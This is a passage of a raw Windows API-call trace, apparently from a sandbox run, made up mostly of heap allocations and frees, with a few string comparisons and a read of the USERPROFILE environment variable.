lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0205.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0205.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0205.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0205.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0205.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0205.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0205.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0205.773] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0205.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0205.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0205.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0205.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0205.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0205.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0205.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0205.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0205.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0205.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0205.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0205.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0205.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0205.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0205.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0205.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0205.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0205.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0205.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x2c) returned 0x2a73610 [0205.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72248 [0205.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E6IDgLQGE97MYwh0a.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0205.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6IDgLQGE97MYwh0a.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0205.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IDgLQGE97MYwh0a.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0205.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DgLQGE97MYwh0a.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0205.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gLQGE97MYwh0a.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0205.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LQGE97MYwh0a.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0205.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QGE97MYwh0a.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0205.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GE97MYwh0a.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0205.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E97MYwh0a.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0205.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="97MYwh0a.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0205.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7MYwh0a.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0205.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MYwh0a.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0205.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ywh0a.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0205.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wh0a.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0205.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h0a.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0205.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0a.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0205.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0205.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2a73370 [0205.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0205.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73370 | out: hHeap=0x2af0000) returned 1 [0205.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0205.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0205.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0205.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0205.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0205.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0205.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0205.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0205.775] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0205.775] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0205.775] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0205.775] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0205.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0205.775] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0205.775] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0205.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0205.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0205.775] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0205.775] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0205.775] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0205.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0205.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a726a8 [0205.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0205.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0205.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0205.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0205.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0205.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0205.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0205.775] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0205.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0205.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0205.775] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0205.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0205.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0205.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa768 [0205.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0205.776] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0205.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa588 [0205.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0205.776] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0205.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0205.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0205.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0205.776] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0205.776] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0205.776] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0205.776] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0205.776] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0205.776] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0205.776] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0205.776] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0205.776] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0205.776] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0205.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0205.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71a0 [0205.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0205.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a74cc0 [0205.776] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0205.776] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0205.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0205.776] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0205.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0205.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0205.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0205.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0205.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71a0 | out: hHeap=0x2af0000) returned 1 [0205.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0205.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0205.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72748 [0205.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0205.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0205.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0205.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0205.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0205.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0205.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0205.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0205.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0205.777] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0205.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0205.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0205.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa7f8 [0205.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0205.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0205.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa828 [0205.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0205.777] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0205.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0205.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0205.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0205.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0205.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0205.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0205.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0205.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0205.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0205.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0205.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0205.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0205.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0205.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0205.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fe0 [0205.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0205.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a74f30 [0205.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0205.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0205.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0205.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0205.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0205.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xd0) returned 0x29f7878 [0205.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74f30 | out: hHeap=0x2af0000) returned 1 [0205.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0205.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fe0 | out: hHeap=0x2af0000) returned 1 [0205.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0205.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0205.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72628 [0205.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0205.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0205.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0205.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0205.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72698 [0205.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0205.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0205.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0205.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa828 [0205.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0205.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0205.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0205.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0205.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0205.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0205.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0205.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0205.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0205.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0205.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0205.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0205.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0205.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0205.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0205.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0205.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0205.780] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0205.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0205.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0205.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0205.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0205.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0205.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a728f8 [0205.780] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0205.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0205.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa08 [0205.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0205.780] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0205.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0205.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0205.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0205.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0205.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0205.780] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0205.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0205.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0205.780] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0205.780] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0205.780] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0205.780] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0205.780] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0205.780] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0205.781] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0205.781] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0205.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ea40 [0205.781] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.781] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0205.781] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0205.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0205.781] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0205.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0205.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0205.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0205.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a38 [0205.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 